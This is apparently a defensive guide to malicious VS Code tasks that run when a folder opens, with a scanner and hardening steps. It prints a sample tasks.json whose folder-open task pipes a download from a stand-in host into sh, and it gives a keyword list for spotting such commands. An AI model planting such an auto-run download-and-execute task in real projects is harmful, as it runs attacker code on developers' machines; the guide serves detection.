How to detect malicious VS Code tasks that run when a folder opens
VS Code, and editors built on it such as Cursor, can run a task automatically when a folder opens if .vscode/tasks.json sets "runOn": "folderOpen". A malicious repository uses this to run a download-and-execute command the moment you look at it. Before opening an unfamiliar folder, scan it with npx am-i-hacked <dir>, which flags editor auto-run tasks and download-and-run commands in editor config, and keep Workspace Trust turned on.
How the attack works
A task file in the repository defines a shell command and asks the editor to run it on folder open:
{
"version": "2.0.0",
"tasks": [
{
"label": "setup",
"type": "shell",
"command": "curl -fsSL https://example.test/setup.sh | sh",
"runOptions": { "runOn": "folderOpen" }
}
]
}
Real examples hide the command better: a long line pushed off screen with whitespace, a script saved under a font or image name, or a task that only runs a harmless-looking node file which does the work. The repository is often presented as a take-home coding test or a bug to fix, so that you open it.
How to spot it
.vscode/tasks.jsonwith"runOn": "folderOpen"..vscode/settings.jsonthat allows automatic tasks (task.allowAutomaticTasks) or points an extension setting at an executable inside the repository.- Any
curl,wget,powershell,base64or| shin editor config. - A task that runs a file whose name does not match its contents, such as a
.woff2that is really a script.
Scan before you open
npx am-i-hacked path/to/repo
am-i-hacked reports an editor auto-run task and a download-and-run command in editor config as separate findings, with file and line, and exits 1. It also flags executable payloads disguised as asset files. Real output from a folder holding the task above:
am-i-hacked: FAILED — 2 findings across 1 file
.vscode/tasks.json:7
"command": "curl -fsSL https://example.test/setup.sh | sh",
→ Download-and-run command in editor config
.vscode/tasks.json:8
"runOptions": { "runOn": "folderOpen" }
→ Editor auto-run task
For editor settings that point at an executable, secure-semgrep's AI rule set includes an ide-settings-executable-path check: npx secure-semgrep ..
Harden the editor
- Keep Workspace Trust on, and open unfamiliar folders in Restricted Mode. Tasks do not run in Restricted Mode.
- Set
task.allowAutomaticTaskstooffin your user settings, so no folder can turn automatic tasks back on. - Read
.vscode/,.idea/and other editor folders withcatorlessbefore you open the project.
If you already opened it
Assume the command ran. Preserve the folder, check the machine with npx am-i-hacked --system for login items, shell startup changes and running processes it may have left behind, and rotate credentials from a different, clean device. See how to check a developer machine.